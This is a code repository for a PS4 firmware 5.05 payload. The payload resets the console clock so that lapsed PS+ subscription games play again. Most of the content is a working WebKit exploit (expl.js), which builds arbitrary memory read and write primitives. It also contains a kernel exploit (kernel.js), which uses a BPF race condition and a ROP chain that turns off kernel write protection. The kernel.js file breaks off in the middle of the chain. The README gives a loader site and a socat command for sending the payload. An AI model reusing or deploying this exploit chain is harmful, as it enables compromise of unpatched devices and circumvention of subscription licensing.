├── .gitignore
├── LICENSE
├── Makefile
├── README.md
├── source
└── main.c
└── www
├── README.md
├── expl.js
├── index.html
├── kernel.js
├── reactPSPlus.js
├── rop.js
├── syscalls.js
└── userland.js
/.gitignore:
--------------------------------------------------------------------------------
1 | /build/
2 | *.bin
3 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
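# Builds a raw, fixed-address PS4 payload image from source/*.c and source/*.s
# against the libPS4 SDK found under $(PS4SDK).
LIBPS4 := $(PS4SDK)/libPS4

# Load addresses handed to the linker via -Ttext / -Tdata below.
TEXT := 0x926200000
DATA := 0x926300000

CC := gcc
AS := gcc
OBJCOPY := objcopy
ODIR := build
SDIR := source
IDIRS := -I$(LIBPS4)/include -I. -Iinclude
LDIRS := -L$(LIBPS4) -L. -Llib
# Freestanding build: no libc and no startup files; libPS4's crt0.s is linked in explicitly.
CFLAGS := $(IDIRS) -O3 -std=gnu11 -fno-builtin -nostartfiles -nostdlib -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
SFLAGS := -nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
LFLAGS := $(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none -Ttext=$(TEXT) -Tdata=$(DATA)
CFILES := $(wildcard $(SDIR)/*.c)
SFILES := $(wildcard $(SDIR)/*.s)
OBJS := $(patsubst $(SDIR)/%.c, $(ODIR)/%.o, $(CFILES)) $(patsubst $(SDIR)/%.s, $(ODIR)/%.o, $(SFILES))

LIBS := -lPS4

# Output name is derived from the checkout directory (expanded once, not on every reference).
TARGET := $(shell basename $(CURDIR)).bin

# $(ODIR) is an order-only prerequisite (after the |): the directory's mtime
# changes whenever an object is written into it, and as a normal prerequisite
# that forced a relink on every invocation. Linking $(OBJS) rather than the
# $(ODIR)/*.o glob keeps stale objects from removed sources out of the image.
$(TARGET): $(OBJS) | $(ODIR)
	$(CC) $(LIBPS4)/crt0.s $(OBJS) -o temp.t $(CFLAGS) $(LFLAGS) $(LIBS)
	$(OBJCOPY) -R .sc_rop temp.t temp.u
	$(OBJCOPY) -O binary temp.u $(TARGET)
	rm -f temp.t temp.u

# Pattern rules also order after $(ODIR) so a parallel build (-j) cannot try to
# write an object before the directory exists.
$(ODIR)/%.o: $(SDIR)/%.c | $(ODIR)
	$(CC) -c -o $@ $< $(CFLAGS)

$(ODIR)/%.o: $(SDIR)/%.s | $(ODIR)
	$(AS) -c -o $@ $< $(SFLAGS)

$(ODIR):
	@mkdir -p $@

.PHONY: clean

# Also drops the link-time temporaries in case a previous build was interrupted.
clean:
	rm -f $(TARGET) $(ODIR)/*.o temp.t temp.u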
43 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # reactPSPLUS
2 |
3 | A simple piece of code that resets the PS4 internal clock back to 2013, which in turn activates PS+ games that have previously been, or currently are, on the console.
4 |
5 | ## Build
6 |
7 | The code has currently been tested to build with [xvortex/ps4-payload-sdk](https://github.com/xvortex/ps4-payload-sdk);
8 | however, I see no reason it wouldn't build with CTurt's or idc's SDK.
9 | Moreover, the code is simple enough that it can easily be ported to any other current or future SDK.
10 |
11 | ## Download
12 | [reactPSPLUS.bin](https://github.com/Thunder07/reactPSPLUS/releases)
13 |
14 | ## Requirement
15 |
16 | * PS4 must (at the moment) be on 5.05 update.
17 | * have a payload loader running (aka http://crack.bargains/505k/ open twice until you see `Awaiting Payload...`)
18 | * or any other means of running this code on PS4
19 |
20 | ## Usage
21 | send the payload to the PS4 using socat (note `192.168.1.1` should be changed to PS4 IP address)
22 | ```
23 | socat FILE:reactPSPLUS.bin TCP:192.168.1.1:9020
24 | ```
25 |
26 | ## Notes
27 | the payload would set the internal clock to 2013 and your PS+ games would start working,
28 | you wouldn't even need to have HEN enabled to use these games since they're legit games and would work normally like any digital game,
29 | if you're not connected to the internet, you will not need to run this exploit again.
30 | it might be worthwhile dumping your games to make sure you never lose access to them.
31 |
--------------------------------------------------------------------------------
/source/main.c:
--------------------------------------------------------------------------------
1 | #include "types.h"
2 |
/*
 * Read a 64-bit model-specific register with RDMSR.
 * RDMSR is a privileged instruction, so this only works when the caller is
 * already executing in ring 0.
 *
 * __register: MSR index, passed in ECX ("c" constraint).
 * Returns EDX:EAX ("=d" / "=a" outputs) joined into one 64-bit value.
 */
uint64_t __readmsr(unsigned long __register)
{
    unsigned long __edx;
    unsigned long __eax;
    __asm__ ("rdmsr" : "=d"(__edx), "=a"(__eax) : "c"(__register));
    return (((uint64_t)__edx) << 32) | (uint64_t)__eax;
}
10 |
/*
 * Intended to run in kernel context (see _main, which hands it to syscall 11).
 * Derives the kernel base from MSR 0xC0000082 (IA32_LSTAR, the SYSCALL entry
 * address) minus a fixed delta, then calls two SRTC kernel routines through
 * hard-coded offsets.
 *
 * Every constant here is firmware-specific: the README lists 5.05 as the only
 * supported firmware, and on any other firmware these pointers land somewhere
 * else in kernel memory.
 */
void resetTime()
{
    uint8_t* kernel_base = (uint8_t*)(__readmsr(0xC0000082) - 0x1C0);
    // Note: somewhere between 1.76 and 5.05 `sceSblSrtcSetTime()` was changed and a few extra checks were added using SAMU,
    // so if you're backporting this you may not need, or even find, `sceSblSrtcClearTimeDifference()`.
    // Finally, `sceSblSrtcClearTimeDifference()` is also named `sceSblSrtcReset()` when the 1st argument is 15.
    void(*sceSblSrtcClearTimeDifference)(uint64_t) = (void*)(kernel_base + 0x634690);
    void(*sceSblSrtcSetTime)(uint64_t) = (void*)(kernel_base + 0x634090);
    sceSblSrtcClearTimeDifference(15);
    // NOTE(review): the unit/encoding of this value is not visible here; the
    // README says the result is a 2013 clock -- confirm before changing it.
    sceSblSrtcSetTime(14861963);
}
22 |
/*
 * Payload entry point (presumably reached from libPS4's crt0.s, which the
 * Makefile links in). Invokes syscall 11, which www/kernel.js patches into the
 * sysent table as a custom "run this function in ring 0" syscall, so resetTime()
 * executes with kernel privileges. syscall() itself comes from libPS4 and is
 * not part of this tree.
 *
 * Returns 0 unconditionally; no result from resetTime() is observable here.
 */
int _main(void)
{
    syscall(11, resetTime);
    return 0;
}
28 |
--------------------------------------------------------------------------------
/www/README.md:
--------------------------------------------------------------------------------
1 | # PS4 5.05 reactPSPLUS
2 | This webpage is based on https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit with Mira & HEN removed; it was repurposed to serve the reactPSPlus web interface.
--------------------------------------------------------------------------------
/www/expl.js:
--------------------------------------------------------------------------------
/**
 * Build a random 8-character string drawn from A-Z, a-z and 0-9.
 * Backed by Math.random, so it is adequate as a throwaway property name but
 * is not a source of unpredictable identifiers.
 * @returns {string} eight alphanumeric characters
 */
function makeid() {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var chars = [];
  var n;
  for (n = 0; n < 8; n++) {
    chars.push(alphabet.charAt(Math.floor(Math.random() * alphabet.length)));
  }
  return chars.join("");
}
10 |
11 | var instancespr = [];
12 |
13 | for (var i = 0; i < 4096; i++) {
14 | instancespr[i] = new Uint32Array(1);
15 | instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
16 | }
17 |
/** Scratch view shared by u2d(); created on first use, 16 bytes of which 8 are used. */
var _dview;

/**
 * Reinterpret a 64-bit bit pattern as an IEEE-754 double.
 * @param {number} low  low 32 bits of the pattern
 * @param {number} hi   high 32 bits of the pattern
 * @returns {number} the double whose bit pattern is hi:low
 */
function u2d(low, hi) {
  if (_dview === undefined) {
    _dview = new DataView(new ArrayBuffer(16));
  }
  // DataView defaults to big-endian for both the writes and the read, so hi
  // occupies bytes 0-3 and low bytes 4-7: read back together they are hi:low.
  _dview.setUint32(0, hi);
  _dview.setUint32(4, low);
  return _dview.getFloat64(0);
}
/**
 * Pressure the allocator so a garbage-collection cycle is likely to run:
 * allocates 0x100 ArrayBuffers of 1 MiB each and drops every one immediately.
 * Returns nothing; no reference to the buffers is retained.
 */
var dgc = function () {
  var remaining = 0x100;
  while (remaining > 0) {
    new ArrayBuffer(0x100000);
    remaining--;
  }
};
31 |
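/**
 * Minimal unsigned 64-bit integer stored as two uint32 halves, `low` and `hi`.
 * Constructor function: use `new int64(low, hi)`; both halves are coerced to
 * uint32 with `>>> 0`. The arithmetic helpers take a 32-bit operand. The
 * `*inplace` variants mutate this object and return nothing; the others leave
 * it untouched and return a fresh int64.
 *
 * Fixes over the previous version: the in-place add/sub left `hi` at 2^32 or
 * -1 instead of wrapping it to uint32, and the borrow test in sub32 relied on
 * `>` binding tighter than `&` (it worked only by accident). toString() always
 * rendered in hex and ignored its argument; that is now explicit.
 *
 * @param {number} low  low 32 bits
 * @param {number} hi   high 32 bits
 */
function int64(low, hi) {
  this.low = (low >>> 0);
  this.hi = (hi >>> 0);

  // Add a 32-bit value to the low half, carrying into hi. Mutates this.
  this.add32inplace = function (val) {
    var base = this.low >>> 0;
    var lo = ((base + val) & 0xFFFFFFFF) >>> 0;
    var carry = lo < base ? 1 : 0;
    // >>> 0 keeps hi a uint32 when the carry wraps it past 0xFFFFFFFF.
    this.hi = ((this.hi >>> 0) + carry) >>> 0;
    this.low = lo;
  };

  // Add a 32-bit value and return the result as a new int64.
  this.add32 = function (val) {
    var base = this.low >>> 0;
    var lo = ((base + val) & 0xFFFFFFFF) >>> 0;
    var carry = lo < base ? 1 : 0;
    return new int64(lo, (this.hi >>> 0) + carry);
  };

  // Subtract a 32-bit value, borrowing from hi, and return a new int64.
  // A borrow out of hi == 0 wraps to 0xFFFFFFFF via the constructor's >>> 0.
  this.sub32 = function (val) {
    var base = this.low >>> 0;
    var lo = ((base - val) & 0xFFFFFFFF) >>> 0;
    var borrow = lo > base ? 1 : 0;
    return new int64(lo, (this.hi >>> 0) - borrow);
  };

  // Subtract a 32-bit value in place, borrowing from hi. Mutates this.
  this.sub32inplace = function (val) {
    var base = this.low >>> 0;
    var lo = ((base - val) & 0xFFFFFFFF) >>> 0;
    var borrow = lo > base ? 1 : 0;
    this.hi = ((this.hi >>> 0) - borrow) >>> 0;
    this.low = lo;
  };

  // Mask only the low half; hi is copied through unchanged.
  this.and32 = function (val) {
    return new int64(this.low & val, this.hi);
  };

  // Mask both halves independently.
  this.and64 = function (vallo, valhi) {
    return new int64(this.low & vallo, this.hi & valhi);
  };

  // Hex rendering without a 0x prefix. The low half is zero-padded to 8
  // digits only when hi is non-zero, so small values print short ("10").
  // Always hexadecimal; any argument is ignored.
  this.toString = function () {
    var loStr = (this.low >>> 0).toString(16);
    if (this.hi === 0) {
      return loStr;
    }
    return (this.hi >>> 0).toString(16) + zeroFill(loStr, 8);
  };

  // Plain-object snapshot of both halves.
  this.toPacked = function () {
    return {
      hi: this.hi,
      low: this.low
    };
  };

  // Load both halves from a toPacked()-shaped object; returns this for chaining.
  this.setPacked = function (pck) {
    this.hi = pck.hi;
    this.low = pck.low;
    return this;
  };

  return this;
}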
122 |
/**
 * Left-pad `number` with '0' characters up to `width` characters.
 * A value containing a '.' receives one extra zero (the original's behaviour,
 * kept so callers see identical output). Always returns a string.
 * @param {number|string} number  value to pad
 * @param {number} width          target length in characters
 * @returns {string}
 */
function zeroFill(number, width) {
  var text = number.toString();
  var missing = width - text.length;
  if (missing <= 0) {
    return text;
  }
  var zeros = missing + (/\./.test(text) ? 1 : 0);
  return "0".repeat(zeros) + text;
}
132 |
// Holder for objects that must stay reachable: kernel.js pushes ROP contexts
// into window.nogc and nothing reads them back.
// NOTE(review): presumably a GC-retention list -- confirm.
var nogc = [];
134 |
/**
 * Report a fatal condition: forward every argument to alert(), then abort the
 * script by throwing the string "fail" (a plain string, not an Error, so a
 * catch sees exactly that value).
 */
var fail = function () {
  var forwarded = Array.prototype.slice.call(arguments);
  alert.apply(null, forwarded);
  throw "fail";
};
139 |
140 | // Target JSObject for overlap
141 | var tgt = {
142 | a: 0,
143 | b: 0,
144 | c: 0,
145 | d: 0
146 | }
147 |
148 | var y = new ImageData(1, 0x4000)
149 | postMessage("", "*", [y.data.buffer]);
150 |
151 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
152 | var props = {};
153 |
154 | for (var i = 0;
155 | (i < (0x4000 / 2));) {
156 | props[i++] = {
157 | value: 0x42424242
158 | };
159 | props[i++] = {
160 | value: tgt
161 | };
162 | }
163 |
164 | var foundLeak = undefined;
165 | var foundIndex = 0;
166 | var maxCount = 0x100;
167 |
168 | while (foundLeak == undefined && maxCount > 0) {
169 | maxCount--;
170 |
171 | history.pushState(y, "");
172 |
173 | Object.defineProperties({}, props);
174 |
175 | var leak = new Uint32Array(history.state.data.buffer);
176 |
177 | for (var i = 0; i < leak.length - 6; i++) {
178 | if (
179 | leak[i] == 0x42424242 &&
180 | leak[i + 0x1] == 0xFFFF0000 &&
181 | leak[i + 0x2] == 0x00000000 &&
182 | leak[i + 0x3] == 0x00000000 &&
183 | leak[i + 0x4] == 0x00000000 &&
184 | leak[i + 0x5] == 0x00000000 &&
185 | leak[i + 0x6] == 0x0000000E &&
186 | leak[i + 0x7] == 0x00000000 &&
187 | leak[i + 0xA] == 0x00000000 &&
188 | leak[i + 0xB] == 0x00000000 &&
189 | leak[i + 0xC] == 0x00000000 &&
190 | leak[i + 0xD] == 0x00000000 &&
191 | leak[i + 0xE] == 0x0000000E &&
192 | leak[i + 0xF] == 0x00000000
193 | ) {
194 | foundIndex = i;
195 | foundLeak = leak;
196 | break;
197 | }
198 | }
199 | }
200 |
201 | if (!foundLeak) {
202 | failed = true
203 | fail("Failed to find leak!")
204 | }
205 |
206 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
207 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
208 |
209 | Array.prototype.__defineGetter__(100, () => 1);
210 |
211 | var f = document.body.appendChild(document.createElement('iframe'));
212 | var a = new f.contentWindow.Array(13.37, 13.37);
213 | var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);
214 |
215 | var master = new Uint32Array(0x1000);
216 | var slave = new Uint32Array(0x1000);
217 | var leakval_u32 = new Uint32Array(0x1000);
218 | var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
219 |
220 | // Create fake ArrayBufferView
221 | tgt.a = u2d(2048, 0x1602300);
222 | tgt.b = 0;
223 | tgt.c = leakval_helper;
224 | tgt.d = 0x1337;
225 |
226 | var c = Array.prototype.concat.call(a, b);
227 | document.body.removeChild(f);
228 | var hax = c[0];
229 | c[0] = 0;
230 |
231 | tgt.c = c;
232 |
233 | hax[2] = 0;
234 | hax[3] = 0;
235 |
236 | Object.defineProperty(Array.prototype, 100, {
237 | get: undefined
238 | });
239 |
240 | tgt.c = leakval_helper;
241 | var butterfly = new int64(hax[2], hax[3]);
242 | butterfly.low += 0x10;
243 |
244 | tgt.c = leakval_u32;
245 | var lkv_u32_old = new int64(hax[4], hax[5]);
246 | hax[4] = butterfly.low;
247 | hax[5] = butterfly.hi;
248 | // Setup read/write primitive
249 |
250 | tgt.c = master;
251 | hax[4] = leakval_u32[0];
252 | hax[5] = leakval_u32[1];
253 |
254 | var addr_to_slavebuf = new int64(master[4], master[5]);
255 | tgt.c = leakval_u32;
256 | hax[4] = lkv_u32_old.low;
257 | hax[5] = lkv_u32_old.hi;
258 |
259 | tgt.c = 0;
260 | hax = 0;
261 |
262 | var prim = {
263 | write8: function (addr, val) {
264 | master[4] = addr.low;
265 | master[5] = addr.hi;
266 |
267 | if (val instanceof int64) {
268 | slave[0] = val.low;
269 | slave[1] = val.hi;
270 | } else {
271 | slave[0] = val;
272 | slave[1] = 0;
273 | }
274 |
275 | master[4] = addr_to_slavebuf.low;
276 | master[5] = addr_to_slavebuf.hi;
277 | },
278 |
279 | write4: function (addr, val) {
280 | master[4] = addr.low;
281 | master[5] = addr.hi;
282 |
283 | slave[0] = val;
284 |
285 | master[4] = addr_to_slavebuf.low;
286 | master[5] = addr_to_slavebuf.hi;
287 | },
288 |
289 | read8: function (addr) {
290 | master[4] = addr.low;
291 | master[5] = addr.hi;
292 |
293 | var rtv = new int64(slave[0], slave[1]);
294 |
295 | master[4] = addr_to_slavebuf.low;
296 | master[5] = addr_to_slavebuf.hi;
297 |
298 | return rtv;
299 | },
300 |
301 | read4: function (addr) {
302 | master[4] = addr.low;
303 | master[5] = addr.hi;
304 |
305 | var rtv = slave[0];
306 |
307 | master[4] = addr_to_slavebuf.low;
308 | master[5] = addr_to_slavebuf.hi;
309 |
310 | return rtv;
311 | },
312 |
313 | leakval: function (jsval) {
314 | leakval_helper[0] = jsval;
315 | var rtv = this.read8(butterfly);
316 | this.write8(butterfly, new int64(0x41414141, 0xffff0000));
317 |
318 | return rtv;
319 | },
320 |
321 | createval: function (jsval) {
322 | this.write8(butterfly, jsval);
323 | var rt = leakval_helper[0];
324 | this.write8(butterfly, new int64(0x41414141, 0xffff0000));
325 | return rt;
326 | }
327 | };
328 |
329 | window.primitives = prim;
330 | if (window.postExpl) window.postExpl();
331 |
--------------------------------------------------------------------------------
/www/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | PS4Brew 5.05
5 |
6 |
55 |
56 |
57 |
100 |
101 |
102 |
103 |
104 |
105 | Year:
106 |
107 |
108 | Month:
109 |
110 |
111 | Day:
112 |
113 |
114 |
115 |
116 | Hour:
117 |
118 |
119 | Minute:
120 |
121 |
122 |
123 |
124 |
125 | Awaiting Payload...
126 |
127 |
128 |
129 | You're all set!
130 |
131 |
132 |
133 | Something went wrong :(
134 |
135 |
136 |
137 | Only firmware 5.05 is supported!
138 |
139 |
140 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
--------------------------------------------------------------------------------
/www/kernel.js:
--------------------------------------------------------------------------------
1 | function kernExploit() {
2 | try {
3 | var offsetToWebKit = function (o) {
4 | return window.webKitBase.add32(o);
5 | }
6 |
7 | var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
8 | var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
9 |
10 | if (fd == (-1 >>> 0)) {
11 | throw "Failed to open first bpf device!"
12 | }
13 |
14 | // Write BPF programs
15 | var bpf_valid = p.malloc32(0x4000);
16 | var bpf_spray = p.malloc32(0x4000);
17 | var bpf_valid_u32 = bpf_valid.backing;
18 |
19 | var bpf_valid_prog = p.malloc(0x40);
20 | p.write8(bpf_valid_prog, 0x800 / 8)
21 | p.write8(bpf_valid_prog.add32(8), bpf_valid)
22 |
23 | var bpf_spray_prog = p.malloc(0x40);
24 | p.write8(bpf_spray_prog, 0x800 / 8)
25 | p.write8(bpf_spray_prog.add32(8), bpf_spray)
26 |
27 | for (var i = 0; i < 0x400;) {
28 | bpf_valid_u32[i++] = 6;
29 | bpf_valid_u32[i++] = 0;
30 | }
31 |
32 | var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
33 |
34 | if(rtv.low != 0) {
35 | throw "Failed to open first bpf device!";
36 | }
37 |
38 | // Spawn thread
39 | var spawnthread = function (name, chain) {
40 | var longjmp = window.webKitBase.add32(0x14e8);
41 | var createThread = window.webKitBase.add32(0x779390);
42 | var contextp = p.malloc32(0x2000);
43 | var contextz = contextp.backing;
44 | contextz[0] = 1337;
45 | var thread2 = new rop();
46 | thread2.push(window.gadgets["ret"]);
47 | thread2.push(window.gadgets["ret"]);
48 | thread2.push(window.gadgets["ret"]);
49 | thread2.push(window.gadgets["ret"]);
50 | chain(thread2);
51 | p.write8(contextp, window.gadgets["ret"]);
52 | p.write8(contextp.add32(0x10), thread2.stackBase);
53 | p.syscall(324, 1);
54 | var retv = function () { p.fcall(createThread, longjmp, contextp, p.stringify(name)); }
55 | window.nogc.push(contextp);
56 | window.nogc.push(thread2);
57 | return retv;
58 | }
59 |
60 | var interrupt1, loop1;
61 | var interrupt2, loop2;
62 | var sock = p.syscall(97, 2, 2);
63 | var kscratch = p.malloc32(0x1000);
64 |
65 | // Racing thread
66 | var start1 = spawnthread("GottaGoFast", function (thread2) {
67 | interrupt1 = thread2.stackBase;
68 | thread2.push(window.gadgets["ret"]);
69 | thread2.push(window.gadgets["ret"]);
70 | thread2.push(window.gadgets["ret"]);
71 |
72 | thread2.push(window.gadgets["pop rdi"]);
73 | thread2.push(fd);
74 | thread2.push(window.gadgets["pop rsi"]);
75 | thread2.push(0x8010427B);
76 | thread2.push(window.gadgets["pop rdx"]);
77 | thread2.push(bpf_valid_prog);
78 | thread2.push(window.gadgets["pop rsp"]);
79 | thread2.push(thread2.stackBase.add32(0x800));
80 | thread2.count = 0x100;
81 | var cntr = thread2.count;
82 | thread2.push(window.syscalls[54]); // ioctl
83 | thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
84 |
85 | thread2.push(window.gadgets["pop rdi"]);
86 | var wherep = thread2.pushSymbolic();
87 | thread2.push(window.gadgets["pop rsi"]);
88 | var whatp = thread2.pushSymbolic();
89 | thread2.push(window.gadgets["mov [rdi], rsi"]);
90 |
91 | thread2.push(window.gadgets["pop rsp"]);
92 |
93 | loop1 = thread2.stackBase.add32(thread2.count * 8);
94 | thread2.push(0x41414141);
95 |
96 | thread2.finalizeSymbolic(wherep, loop1);
97 | thread2.finalizeSymbolic(whatp, loop1.sub32(8));
98 | });
99 |
100 | // start setting up chains
101 | var krop = new rop();
102 | var race = new rop();
103 |
104 | /**
105 | * Qwerty Madness!
106 | * -
107 | * This section contains magic. It's for bypassing Sony's ghetto "SMAP".
108 | * Need to be a level 99 mage to understand this completely (not really but kinda). ~ Specter
109 | **/
110 |
111 | var ctxp = p.malloc32(0x2000);
112 | var ctxp1 = p.malloc32(0x2000);
113 | var ctxp2 = p.malloc32(0x2000);
114 |
115 | p.write8(bpf_spray.add32(16), ctxp);
116 | p.write8(ctxp.add32(0x50), 0);
117 | p.write8(ctxp.add32(0x68), ctxp1);
118 | var stackshift_from_retaddr = 0;
119 | p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // sub rsp
120 |
121 | stackshift_from_retaddr += 8 + 0x58;
122 |
123 | p.write8(ctxp.add32(0), ctxp2);
124 | p.write8(ctxp.add32(0x10), ctxp2.add32(8));
125 | p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
126 |
127 | var iterbase = ctxp2;
128 |
129 | for (var i = 0; i < 0xf; i++) {
130 | p.write8(iterbase, offsetToWebKit(0x12A19CD)); // sub rsp
131 | stackshift_from_retaddr += 8 + 0x58;
132 | p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
133 | p.write8(iterbase.add32(8), iterbase.add32(0x20));
134 | p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
135 | iterbase = iterbase.add32(0x20);
136 | }
137 |
138 | var raxbase = iterbase;
139 | var rdibase = iterbase.add32(8);
140 | var memcpy = get_jmptgt(webKitBase.add32(0xF8));
141 | memcpy = p.read8(memcpy);
142 |
143 | p.write8(raxbase, offsetToWebKit(0x15CA41B));
144 | stackshift_from_retaddr += 8;
145 |
146 | p.write8(rdibase.add32(0x70), offsetToWebKit(0x1284834));
147 | stackshift_from_retaddr += 8;
148 |
149 | p.write8(rdibase.add32(0x18), rdibase);
150 | p.write8(rdibase.add32(8), krop.stackBase);
151 | p.write8(raxbase.add32(0x30), window.gadgets["mov rbp, rsp"]);
152 | p.write8(rdibase, raxbase);
153 | p.write8(raxbase.add32(0x420), offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
154 | p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90));
155 | var topofchain = stackshift_from_retaddr + 0x28;
156 | p.write8(rdibase.add32(0xB0), topofchain);
157 |
158 | for (var i = 0; i < 0x1000 / 8; i++) {
159 | p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
160 | }
161 |
162 | krop.count = 0x10;
163 |
164 | /**
165 | * End of Qwerty madness
166 | **/
167 |
168 | /**
169 | * Bit of info:
170 | * -
171 | * The "kchain" buffer is used to store the kernel ROP chain, and is managed by the "krop" class defined in rop.js.
172 | * There are also two helper functions for the class, "kpatch" and "kpatch2" for patching the kernel defined below.
173 | * The "kchainstack" buffer should not be used directly as it is managed by the "krop" class!
174 | * -
175 | * The "kscratch" buffer is used to save context. The layout is as follows:
176 | * kscratch + 0x00: contents of rax register (points to kernel base + 0x16DB6C)
177 | * kscratch + 0x08: pointer to function stub that manipulates cr0 (mov rax, cr0; or rax, 5002Ah; mov cr0, rax; ret)
178 | * kscratch + 0x10: contents of cr0 before the write protection bit is flipped for kernel patching
179 | * kscratch + 0x18: pointer to kscratch
180 | * kscratch + 0x40: "pop rax" gadget
181 | * kscratch + 0x420: "pop rdi" gadget
182 | **/
183 |
184 | // Helper function for patching kernel
185 | var kpatch = function(offset, qword) {
186 | krop.push(window.gadgets["pop rax"]);
187 | krop.push(kscratch);
188 | krop.push(window.gadgets["mov rax, [rax]"]);
189 | krop.push(window.gadgets["pop rsi"]);
190 | krop.push(offset);
191 | krop.push(window.gadgets["add rax, rsi"]);
192 | krop.push(window.gadgets["pop rsi"]);
193 | krop.push(qword);
194 | krop.push(window.gadgets["mov [rax], rsi"]);
195 | }
196 |
197 | // Helper function for patching kernel with information from kernel.text
198 | var kpatch2 = function(offset, offset2) {
199 | krop.push(window.gadgets["pop rax"]);
200 | krop.push(kscratch);
201 | krop.push(window.gadgets["mov rax, [rax]"]);
202 | krop.push(window.gadgets["pop rsi"]);
203 | krop.push(offset);
204 | krop.push(window.gadgets["add rax, rsi"]);
205 | krop.push(window.gadgets["mov rdi, rax"]);
206 | krop.push(window.gadgets["pop rax"]);
207 | krop.push(kscratch);
208 | krop.push(window.gadgets["mov rax, [rax]"]);
209 | krop.push(window.gadgets["pop rsi"]);
210 | krop.push(offset2);
211 | krop.push(window.gadgets["add rax, rsi"]);
212 | krop.push(window.gadgets["mov [rdi], rax"]);
213 | }
214 |
215 | p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
216 | p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
217 | p.write8(kscratch.add32(0x18), kscratch);
218 |
219 | krop.push(window.gadgets["pop rdi"]);
220 | krop.push(kscratch.add32(0x18));
221 | krop.push(window.gadgets["mov rbp, rsp"]);
222 |
223 | var rboff = topofchain - krop.count * 8 + 0x28;
224 |
225 | krop.push(offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
226 | krop.push(window.gadgets["pop rax"]);
227 | krop.push(rboff);
228 | krop.push(window.gadgets["add rdi, rax"]);
229 |
230 | krop.push(window.gadgets["mov rax, [rdi]"]);
231 | krop.push(window.gadgets["pop rsi"]);
232 | krop.push(0x2FA);
233 | krop.push(window.gadgets["add rax, rsi"]);
234 | krop.push(window.gadgets["mov [rdi], rax"]);
235 |
236 | var shellbuf = p.malloc32(0x1000);
237 |
238 | // Save context of cr0 register
239 | krop.push(window.gadgets["pop rdi"]); // save address in usermode
240 | krop.push(kscratch);
241 | krop.push(window.gadgets["mov [rdi], rax"]);
242 | krop.push(window.gadgets["pop rsi"]);
243 | krop.push(0xC54B4);
244 | krop.push(window.gadgets["add rax, rsi"]);
245 | krop.push(window.gadgets["pop rdi"]);
246 | krop.push(kscratch.add32(0x08));
247 | krop.push(window.gadgets["mov [rdi], rax"]);
248 | krop.push(window.gadgets["jmp rax"]);
249 | krop.push(window.gadgets["pop rdi"]); // save cr0
250 | krop.push(kscratch.add32(0x10));
251 |
252 | // Disable kernel write protection for .text
253 | krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
254 | krop.push(window.gadgets["pop rsi"]);
255 | krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
256 | krop.push(window.gadgets["and rax, rsi"]);
257 | krop.push(window.gadgets["mov rdx, rax"]);
258 | krop.push(window.gadgets["pop rax"]);
259 | krop.push(kscratch.add32(8));
260 | krop.push(window.gadgets["mov rax, [rax]"]);
261 | krop.push(window.gadgets["pop rsi"]);
262 | krop.push(0x9);
263 | krop.push(window.gadgets["add rax, rsi"]);
264 | krop.push(window.gadgets["mov rdi, rax"]);
265 | krop.push(window.gadgets["mov rax, rdx"]);
266 | krop.push(window.gadgets["jmp rdi"]);
267 |
268 | krop.push(window.gadgets["pop rax"]);
269 | krop.push(kscratch);
270 | krop.push(window.gadgets["mov rax, [rax]"]);
